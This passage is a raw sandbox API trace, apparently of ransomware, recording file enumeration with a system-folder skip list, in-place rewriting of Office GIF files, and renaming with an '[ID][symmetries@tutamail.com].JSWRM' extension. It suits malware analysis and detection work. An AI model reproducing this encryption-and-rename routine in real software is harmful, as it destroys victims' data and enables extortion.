RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0118.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0118.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0118.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0118.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0118.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0118.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0118.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0118.962] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR21F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir21f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR21F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir21f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0118.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0118.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0118.963] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fd7, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR22F.GIF", cAlternateFileName="")) returned 1 [0118.963] lstrcmpiW (lpString1="PDIR22F.GIF", lpString2=".") returned 1 [0118.963] lstrcmpiW (lpString1="PDIR22F.GIF", lpString2="..") returned 1 [0118.963] lstrcmpiW (lpString1="PDIR22F.GIF", lpString2="...") returned 1 [0118.963] lstrcmpiW (lpString1="PDIR22F.GIF", lpString2="windows") returned -1 [0118.963] lstrcmpiW (lpString1="PDIR22F.GIF", lpString2="recovery") returned -1 [0118.963] lstrcmpiW (lpString1="PDIR22F.GIF", lpString2="perflogs") returned -1 [0118.963] lstrcmpiW (lpString1="PDIR22F.GIF", lpString2="documents and settings") returned 1 [0118.963] lstrcmpiW (lpString1="PDIR22F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.963] lstrcmpiW (lpString1="PDIR22F.GIF", lpString2="system volume information") returned -1 [0118.963] lstrcmpiW (lpString1="PDIR22F.GIF", lpString2="msocache") returned 1 [0118.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0118.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR22F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR22F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR22F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0118.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0118.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR22F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR22F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR22F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0118.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0118.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0118.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0118.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR22F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir22f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.964] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=8151) returned 1 [0118.964] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1fd0) returned 0x24c1d0 [0118.964] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1fd0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1fd0, lpOverlapped=0x0) returned 1 [0118.973] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.973] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1fd0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1fd0, lpOverlapped=0x0) returned 1 [0118.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.973] CloseHandle (hObject=0x314) returned 1 [0118.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0118.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0118.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0118.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0118.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0118.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0118.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0118.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0118.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.973] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR22F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir22f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR22F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir22f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0118.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0118.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0118.974] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x313b, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR23F.GIF", cAlternateFileName="")) returned 1 [0118.974] lstrcmpiW (lpString1="PDIR23F.GIF", lpString2=".") returned 1 [0118.974] lstrcmpiW (lpString1="PDIR23F.GIF", lpString2="..") returned 1 [0118.974] lstrcmpiW (lpString1="PDIR23F.GIF", lpString2="...") returned 1 [0118.975] lstrcmpiW (lpString1="PDIR23F.GIF", lpString2="windows") returned -1 [0118.975] lstrcmpiW (lpString1="PDIR23F.GIF", lpString2="recovery") returned -1 [0118.975] lstrcmpiW (lpString1="PDIR23F.GIF", lpString2="perflogs") returned -1 [0118.975] lstrcmpiW (lpString1="PDIR23F.GIF", lpString2="documents and settings") returned 1 [0118.975] lstrcmpiW (lpString1="PDIR23F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.975] lstrcmpiW (lpString1="PDIR23F.GIF", lpString2="system volume information") returned -1 [0118.975] lstrcmpiW (lpString1="PDIR23F.GIF", lpString2="msocache") returned 1 [0118.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0118.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR23F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR23F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR23F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0118.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0118.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR23F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR23F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR23F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0118.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0118.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0118.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0118.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR23F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir23f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.976] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12603) returned 1 [0118.976] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3130) returned 0x24c1d0 [0118.976] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3130, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x3130, lpOverlapped=0x0) returned 1 [0119.008] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.008] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3130, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x3130, lpOverlapped=0x0) returned 1 [0119.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0119.008] CloseHandle (hObject=0x314) returned 1 [0119.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0119.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0119.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0119.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.009] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR23F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir23f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR23F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir23f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0119.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0119.009] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16ad, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR24F.GIF", cAlternateFileName="")) returned 1 [0119.010] lstrcmpiW (lpString1="PDIR24F.GIF", lpString2=".") returned 1 [0119.010] lstrcmpiW (lpString1="PDIR24F.GIF", lpString2="..") returned 1 [0119.010] lstrcmpiW (lpString1="PDIR24F.GIF", lpString2="...") returned 1 [0119.010] lstrcmpiW (lpString1="PDIR24F.GIF", lpString2="windows") returned -1 [0119.010] lstrcmpiW (lpString1="PDIR24F.GIF", lpString2="recovery") returned -1 [0119.010] lstrcmpiW (lpString1="PDIR24F.GIF", lpString2="perflogs") returned -1 [0119.010] lstrcmpiW (lpString1="PDIR24F.GIF", lpString2="documents and settings") returned 1 [0119.010] lstrcmpiW (lpString1="PDIR24F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.010] lstrcmpiW (lpString1="PDIR24F.GIF", lpString2="system volume information") returned -1 [0119.010] lstrcmpiW (lpString1="PDIR24F.GIF", lpString2="msocache") returned 1 [0119.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0119.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR24F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR24F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR24F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0119.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0119.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR24F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR24F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR24F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0119.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0119.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0119.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0119.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR24F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir24f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.011] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=5805) returned 1 [0119.011] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16a0) returned 0x24c1d0 [0119.011] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x16a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x16a0, lpOverlapped=0x0) returned 1 [0119.021] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.021] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x16a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x16a0, lpOverlapped=0x0) returned 1 [0119.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0119.021] CloseHandle (hObject=0x314) returned 1 [0119.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0119.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0119.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0119.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0119.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0119.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0119.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: 